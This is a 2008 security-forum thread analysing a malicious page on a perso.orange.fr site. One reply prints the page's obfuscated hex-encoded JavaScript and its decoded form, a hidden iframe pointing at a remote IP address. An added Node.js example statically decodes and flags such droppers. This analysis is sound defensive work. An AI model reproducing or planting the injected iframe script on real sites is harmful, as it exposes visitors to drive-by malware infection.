Author Topic: perso.orange.fr  (Read 5711 times)

May 05, 2008, 01:56:09 am
cconniejean

Code: [Select]
hxxp://perso.orange.fr/lightningbolttraffic/sites/
Checking this advertiser link that is posted above. My browser window shuts down. I'm seeing code in a script tag. LinkScannerPro says the above URL has a link to a known exploit site. When trying to copy and paste at our forum we got a virus alert for virus js/psyme.qm and warnings on it interfering with the MySQL somehow on the forum.

May 05, 2008, 06:55:39 am
Reply #1

Edgar Bangkok

The site has obfuscated JavaScript:
Code: [Select]
<script>function v481b6eb925459(v481b6eb925d85){ var v481b6eb926451=16; return(parseInt(v481b6eb925d85,v481b6eb926451));}function v481b6eb926c47(v481b6eb92703e){ function v481b6eb927c33 () {var v481b6eb92802f=2; return v481b6eb92802f;} var v481b6eb92743a='';for(v481b6eb927836=0; v481b6eb927836<v481b6eb92703e.length; v481b6eb927836+=v481b6eb927c33()){ v481b6eb92743a+=(String.fromCharCode(v481b6eb925459(v481b6eb92703e.substr(v481b6eb927836, v481b6eb927c33()))));}return v481b6eb92743a;} document.write(v481b6eb926c47('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D6336323561306634207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323339363734292B273430363830313439636538385C272077696474683D343039206865696768743D353836207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<CENTER>

After deobfuscation we have another script:

Code: [Select]
<SCRIPT>window.status='Done';document.write('<iframe name=c625a0f4 src=\'http://77.221.133.150/.if/go.html?'+Math.round(Math.random()*239674)+'40680149ce88\' width=409 height=586 style=\'display: none\'></iframe>')</SCRIPT>
It points to a Russian site, but if I load this page link directly I receive only:

Code: [Select]
Forbidden

You don't have permission to access /.if/go.html on this server.


Maybe the site needs to be called at
Code: [Select]
src=\'http://77.221.133.150/.if/go.html
with a different referer or from another page.

Edgar   ;D
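
Added example, not part of the original post or of any tool the posters used: the decoding step from Reply #1 done statically in Node.js, so nothing from the suspect page is executed. It goes beyond the single layer in the post by following nested hex layers; the sample input, the `example.invalid` host, the function names and the 16-pair threshold are constructed assumptions.

```javascript
// Static triage of hex-packed document.write() droppers (added example).
// Strings are decoded and inspected only; nothing from the page is evaluated.

// Same transform as the obfuscated helper: each 2-digit hex pair -> one character.
function decodeHexPairs(hex) {
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Quoted literals made only of hex pairs. minPairs is an assumed threshold that
// skips short values such as colour codes.
function findHexLiterals(text, minPairs = 16) {
  const re = new RegExp(`(['"])((?:[0-9A-Fa-f]{2}){${minPairs},})\\1`, 'g');
  return [...text.matchAll(re)].map(m => m[2]);
}

// Report iframe tags and whether they are styled or sized to be invisible.
function findIframes(markup) {
  return [...markup.matchAll(/<iframe\b[^>]*>/gi)].map(([tag]) => {
    const src = (tag.match(/\bsrc\s*=\s*\\?['"]?([^'"\s>\\]+)/i) || [])[1] || null;
    const dims = [...tag.matchAll(/\b(?:width|height)\s*=\s*\\?['"]?(\d+)/gi)].map(m => +m[1]);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag) ||
                   dims.some(d => d <= 1);
    return { src, hidden };
  });
}

// Decode layer by layer (bounded), collecting iframes found at each depth.
function triage(html, maxDepth = 5) {
  const findings = [];
  let layer = [html];
  for (let depth = 0; depth <= maxDepth && layer.length; depth++) {
    for (const text of layer) findings.push(...findIframes(text).map(f => ({ depth, ...f })));
    layer = layer.flatMap(t => findHexLiterals(t)).map(decodeHexPairs);
  }
  return findings;
}

// Constructed sample (not the page's payload): placeholder host, packed twice.
const pack = s => Buffer.from(s, 'latin1').toString('hex').toUpperCase();
const inner = "<iframe src=\\'http://example.invalid/go.html?'+Math.random()+'\\' " +
              "width=409 height=586 style=\\'display: none\\'></iframe>";
const layer1 = `<SCRIPT>document.write(d('${pack(inner)}'))</SCRIPT>`;
const sample = `<script>document.write(d('${pack(layer1)}'));</script>`;
console.log(triage(sample));
```

The reported `src` stops at the first quote, so it is only the static prefix of a URL that the script completes at run time with a random number.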

May 05, 2008, 10:08:38 pm
Reply #2

cconniejean

Thank you Edgar. I just checked out your blog, nice.

May 06, 2008, 03:27:36 am
Reply #3

Edgar Bangkok

Today the Russian site is working OK and I find a hidden iframe with other JavaScript in the page if.go

I think it is the same as described on the BitDefender site at

http://www.bitdefender.com/VIRUS-1000262-en--Trojan.Clicker.HTML.IFrame.AR.html

Edgar  ;D